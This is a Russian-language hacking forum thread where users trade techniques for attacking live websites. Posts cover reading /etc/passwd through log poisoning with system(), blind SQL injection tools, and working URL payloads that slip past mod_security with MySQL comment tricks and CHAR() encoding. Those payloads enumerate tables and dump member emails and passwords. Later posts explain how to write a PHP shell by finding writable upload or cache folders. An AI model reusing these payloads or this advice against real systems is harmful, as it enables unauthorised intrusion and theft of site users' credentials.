Ваши вопросы по уязвимостям.

Все файлы перестали открываться и /etc/passwd и /etc/httpd/config/httpd.conf?
Если сама дырка осталась, то вряд ли system() запретили.
Ссылку в студию?

 

Перестал открываться сам лог только, в который и было записано system(), я вот думаю system был отключен и это вызывало ошибку, а вывод самой ошибки был закрыт. Идея имеет право на жизнь, как думаете??? И работал кто-то с логами напрямую для шелов? Все остальное осталось как было. Причем это было на двух логах этой дыры. Дома на днях поищу ссыль.

 

trafbot
Чтобы не гадать насчет отключения system, поищи php.ini.

 

Раскрою тебе небольшой секрет, если написать %3A, и : в браузере, разницы небудет, ога?

 

нужен скрипт для блайнд-скуль с использованием more1row.Подскажите таковой!)

 

ну это понятное дело, вам кажется не хватает "практики" по sql инъекциям

 

Toolza от Pashkela.
Поддерживает и floor(rand()) и NAME_CONST

 

floor(rand()) и NAME_CONST поддерживают руки, для них скрипты не нужны.

Снейк просит скрипт для чистого блайнда more1row, разве в этом скрипте такое есть?

Я не увидел, хотя возможно не там искал, ведь я скептически отношусь к разработкам автора если и правда есть, покажи будь так добр

 

) ми уже усовершенствовал скрипт децл, спешиал фор $n@ke, скоро будут выложены обновления в соответствующей теме

 

Спасибо.Toolza уже работает отлично!))

 

ребят вот так я обошел фильтрацию на union select

id=2/**/and/**/1=0/**//*!union*/+/*!select*/+1,2,3,4

но тут еще есть фильтрация на information_schema, а как с этим быть?

 

Oбходится также: from/*!information_schema.tables*/
Кстати, обычно чтобы обойти данную фильтрацию (mod_security), достаточно заключить в комментарии один из операторов. Например /*!union*/select

 

id=2/**/and/**/1=0/**//*!union+select+1,2,table_name,4+from+information_schema.tables*/--

 

Iceangel_ & pinch

не катит (

вот интересно information_schema.columns работает а information_schema.tables не работает

брутил имя таблицы "member"

и вот такой запрос получилось

id=2/**/and/**/1=0/**//*!union*/+/*!select*/+1,2,column_name,4+from+/*!information_schema.columns*/+/*!where*/+/*!table_name*/=/*!CHAR*/(109,101,109,98,101,114)

...

Hasta la vista baby

id=2/**/and/**/1=0/**//*!union*/+/*!select*/+1,2,aes_decrypt(aes_encrypt(concat(Email,0x3a,Password),1),1),4+from+/*!member*/

 

есть sql, хочу создать пхп файл

1. file_priv=Y
2. magic_quotes_gpc=off
3. есть полный путь
4. есть папка icons

читаю файлики с помощью load_file, но создать файл не выходит в чем может быть проблема?

 

pinch

a в папке icons есть права на запись?

 

видимо нет=))) что можно сделать, поискать папки на запись? или можно еще чтото сделать?

 

первый вариант, смотри на папки типа template

 

pinch, посканьте сайт каким-нить сканером директорий, затем методом тыка поищите каталог на запись

 

pinch посмотри если сайт на кмс построен, соответсвенно скачай и посмотри какие папки есть и пробуй всe, ну и конечно пробуй папки: store, tmp,temp,img,im,admin,adm,cache,images,upl,uploads ........etc... если в них нет ограничений по исполнению в .htaccess